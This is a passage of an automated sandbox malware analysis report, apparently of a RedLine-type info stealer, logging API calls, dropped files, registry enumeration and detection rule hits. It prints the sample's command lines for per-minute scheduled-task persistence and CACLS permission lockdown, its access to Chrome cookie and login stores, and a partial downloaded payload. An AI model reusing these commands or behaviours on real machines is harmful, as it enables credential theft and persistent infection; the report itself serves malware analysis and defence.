CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7585788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x746da48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x746d853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x746da4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x746ecd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x746ed87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 104002204
registers.edi: 88892516
registers.eax: 104002204
registers.ebp: 104002284
registers.edx: 7502716
registers.ebx: 104002568
registers.esi: 2147746133
registers.ecx: 88745016
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x747ff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x75c6414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x746cfe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x747fa338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x761ae99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x761872ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7617ab0d
GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x7617ea98
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x761787f7
CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x7617ba32
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4
DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x75857bca
CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x761a516f
CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x761a50ce
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7617a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76179b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76179aa8
CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x761a530c
URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x761a57a0
DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x69d1540c
DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x69d152ca
CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x69df0ea3
RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x76f77e96
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x76f554f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 65789352
registers.edi: 1953561104
registers.eax: 65789352
registers.ebp: 65789432
registers.edx: 1
registers.ebx: 88709276
registers.esi: 2147746133
registers.ecx: 1322947701
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Temp\87E8.tmp\87F8.tmp\87F9.bat
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\Xf6FM0Om.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6li43XC.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\4xZ332Qr.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\xu7aE2xu.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\5QZ57Cm.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\CL7mg6kK.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\3Fy8If55.exe
file C:\Users\test22\AppData\Local\Temp\IXP004.TMP\1Xf30uE8.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\sw8Ll4hQ.exe
file C:\Users\test22\AppData\Local\Temp\IXP004.TMP\2LJ507bv.exe
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\87E8.tmp\87F8.tmp\87F9.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6li43XC.exe"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Windows\sysnative\cmd
parameters: /c "C:\Users\test22\AppData\Local\Temp\87E8.tmp\87F8.tmp\87F9.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6li43XC.exe"
filepath: C:\Windows\sysnative\cmd
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 16 (PAGE_EXECUTE)
base_address: 0x05e50000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyá–å~Lyá–â~Ryá–ä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPEL ïeà! ތ>ð°@ Jœ<K<€øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD` D@À.rsrcø€P@@.relocTR@Bj h¨<¹phè?#hêèŒ*YÃÌÌÌj8hÌ<¹ˆhè#h`êèl*YÃÌÌÌj8hÌ<¹ hèÿ"hÀêèL*YÃÌÌÌj8hÌ<¹¸hèß"h ëè,*YÃÌÌÌj8h=¹Ðhè¿"h€ëè *YÃÌÌÌj0hD=¹èhèŸ"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌh€h°=¹iè\"h ìè©)YÃj?h€>¹0iè?"híèŒ)YÃÌÌ̋ÁÂÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèÂ2ƒÄ‹Æ^]ÂÌÌ̋I¸|<…ÉEÁÃÌÌU‹ìV‹ñFÇ”ñPèó2ƒÄöEt j Vè«%ƒÄ‹Æ^]AÇ”ñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀ‹ÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌU‹ìƒì MôèÒÿÿÿhˆJEôPè›2ÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèò1ƒÄÇìñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPè²1ƒÄÇ ñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹ZVWQS‹ñè‹=€h3É3À‰}ü…Û~53Ò;NjþEЃ=„h¸phCphƒ~r‹>ŠˆA‹}üB;Ë|˃~r‹_Æ‹Æ^[‹å]Ã_Æ‹Æ^[‹å]ÃÌÌÌÌÌU‹ìƒìSVW‹ò‹ùQ‰}ô‹FP‰Eðè“3ۉ]ø9]ðŽ)Dƒ~‹Ær‹¾Pè¯KƒÄ…Àu-‹N‹Æƒùr‹€< t‹Æƒùr‹ƒ‹Ïr‹Šé̃~‹Ær‹‹=@i3ҋ Di…ÿt+ŠˆEÿfDŠ]ÿƒù¸0iC0i8‹]øtB;×ráƒÊÿ‹E‹Èƒxr‹3À…ÿt.Š ˆMÿDƒ=Di¹0iŠ]ÿC 0i8‹]øt@;Çr݃Èÿƒ=Di¹0iC 0i‰Mì‹Mô‰Møƒyr‹ ‰Mø‹Ï+ȍ 3Ò÷÷‹Mì‹}ôŠ ‹MøˆC‰]ø;]ðŒÜþÿÿƒr‹Æ‹Ç_^[‹å]ÃÆ‹Ç_^[‹å]ÃÌÌÌÌÌÌÌÌÌÌU‹ìƒì@SVW‹Ù‹òQMĉ]ôèçýÿÿEċÖPMÜèYþÿÿhÇCÇCÆè°"‹Ø¹ƒÈÿ‰]ø‹ûƒÄ ó«3Ò„¾Š8>‰‹Bƒú@|ð‹Uì3ö3ۍ~ø…ÒtA‹Møƒ}ðEÜCEܾ‹ƒøÿt'ÁæðƒÇx‹Ï‹ÆÓø‹MôPè‹Uìƒï‹MøC;Úr‹Eø…ÀthPèð!ƒÄ‹Uðƒúr(‹MÜB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwVRQèÀ!ƒÄ‹UØÇEìÇEðÆE܃úr(‹MÄB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQè~!ƒÄ‹Eô_^[‹å]Ãè›GÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì4‹E0SVW3ÿÆEè¾…À„‹]ÇEàÇEäÆEÐ;Ç‚´+ǍMÐ;ÃB؃}4E CE SÇPèƒþr.‹MèV‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡hRQè× ƒÄMЃ}Uó~EàEèCUƒ}ä‹uà‹]f~ÉMèCÁfÖEø;óu\ƒîr‹; uƒÀƒÂƒîsïƒþü„îŠ: u7ƒþý„ߊH:Ju&ƒþþ„ΊH:Juƒþÿ„½Š@:B„±‹E0G‹uü;ø‚õþÿÿ3ÿ‹Uƒþr/‹MèF‹Áþr‹IüƒÆ#+ÁƒÀüƒø‡’VQè ‹UƒÄ‹Eƒør'H‹Âùr‹RüƒÁ#+ƒÀüƒøw`QRèσċU4ÇEÇEÆEƒúr3‹M B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwë ‹uüGéWÿÿÿRQ肃ċÇ_^[‹å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹]V‹ñ‰]üWjhÀ>ÇFÇFÆèD3ÿ…Û~1ƒ}ECEŠ8S¿C €ú¶È¶ÃGȶÁ‹ÎPèG;}ü|ϋUƒúr(‹MB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèуÄ_‹Æ^[‹å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì0VWj$hÄ>MÐÇEàÇEäÆEÐè—‹E…Àu3öéÇ3ÿ…À„¸ÇEøÇEüÆEè;Ç‚F+ǹ;ÁBȃ}ECEQǍMèPèBƒìEЋÌPètƒìEè‹ôƒì‹ÌPèa‹ÎèªþÿÿƒÄè¢üÿÿ‹UüƒÄ0…À„šƒúr,‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡¹RQèǃċEG;ø‚Hÿÿÿ¾‹Uäƒúr(‹MÐB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwxRQ膃ċUƒúr^‹MB‹ÁúrF‹IüƒÂ#+ÁƒÀüƒøwHë4ƒúr(‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw#RQè1ƒÄ3öétÿÿÿRQè ƒÄ_‹Æ^‹å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌU‹ìQ‹E‹U‹MV…À„‚S@WPè] ƒÄMƒ}‹Ø‹ÓCM+ъIˆD ÿ„Àuó‹óNŠF„Àuù+ñFVjÿðV‹øSWÿðPèÇ5ƒÄ WÿðjÿñÿñWjÿñÿ ñ‹U‹M_[^ƒúr%B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèAƒÄ‹å]ÃèdBÌÌÌÌU‹ìƒì$SVW‹ùjÇGÇGÆÿñ…À„‡j ÿ$ñ‹Ø‰]ü…Û„lSÿð‰Eô…À„SjjjjjÿPjhéýÿ ð‹ð‰uø…öŽ.‹WN;Êw‰O‹Çƒr‹ÆëF‹G‹Ù+Ú+Â;Øw%ƒ‹Ç‰Or‹S4jVèE,ÆƒÄ ‹uøëQSÆEø‹ÏÿuøS訋]üƒ‹Çr‹jjVPjÿÿuô
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x0016d800', u'virtual_address': u'0x0000c000', u'entropy': 7.976440396212957, u'name': u'.rsrc', u'virtual_size': u'0x0016e000'} entropy 7.97644039621 description A section with a high entropy has been found
entropy 0.978253596521 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Take ScreenShot rule ScreenShot
description PWS Memory rule Generic_PWS_Memory_Zero
description RedLine stealer rule RedLine_Stealer_m_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000508
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

 regkey_r: AddressBook
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

 regkey_r: Connection Manager
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

 regkey_r: DirectDrawEx
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

 regkey_r: EditPlus
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

 regkey_r: ENTERPRISE
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

 regkey_r: Fontcore
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

 regkey_r: Google Chrome
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

 regkey_r: Haansoft HWord 80 Korean
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

 regkey_r: IE40
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

 regkey_r: IE4Data
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

 regkey_r: IE5BAKEX
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

 regkey_r: IEData
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

 regkey_r: MobileOptionPack
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

 regkey_r: SchedulingAgent
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

 regkey_r: WIC
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

 regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

 regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

 regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0015-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0016-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0018-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0019-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-001A-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-001B-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-001F-0409-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-001F-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0028-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-002C-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0030-0000-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0044-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-006E-0409-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-006E-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-00A1-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0114-0412-0000-0000000FF1CE}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}
1 0 0

